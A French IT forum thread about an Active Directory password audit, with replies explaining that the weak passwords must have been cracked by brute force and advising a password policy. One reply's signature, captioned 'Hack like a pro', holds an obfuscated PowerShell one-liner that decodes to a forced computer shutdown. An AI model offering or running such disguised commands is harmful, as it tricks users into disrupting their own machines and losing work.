Annonce

Réduire
Aucune annonce.

Audit de mot de passe active directory

Réduire
X
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Audit de mot de passe active directory

    Bonjour,

    Nous avons subit un audit des mots de passe de notre AD et le rapport indiquait que plusieurs mots de passe étaient identiques, de type incrémentiel, contenaient des logins ou n'avaient pas assez de caractères.
    Pour les mots de passe identiques, je pense qu'il suffit de comparer les hash mais pour les autres défauts je n'ai rien trouvé permettant d'avoir ces infos sans décrypter les mots de passe.
    Existe t il des logiciels capable de faire des stats sans montrer les mots de passe ? J'ai peur qu'ils aient compromis tous nos mots de passe.

    Merci d'avance pour votre aide
    Cdt

  • #2
    Salut.

    Tu ne peux effectivement pas avoir d'infos sans décrypter les mots de passe.
    l'auditeur a donc eu connaissance des mots de passe qui ont pu être cassés pendant le process de bruteforce.

    Maintenant je ne vois pas en quoi c'est un problème : les mots de passe qui ont été découverts sont faibles, et doivent de toute manière être changés.
    Pense à communiquer avec les utilisateurs, les sensibiliser, et définir une politique de mot de passe. (Dans ta PSSI, puis techniquement, sur ton AD).

    ./Kriss



    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Hello Kriss

      Ce n'est effectivement pas un problème pour les mots de passe faible mais pour les comptes de service ça l'est un peu plus.
      Les actions préconisées ont été lancées mais je voulais avoir confirmation car les auditeurs nous ont dit qu'ils n'avaient pas décrypter les mots de passe.

      Merci encore

      Commentaire

      Chargement...
      X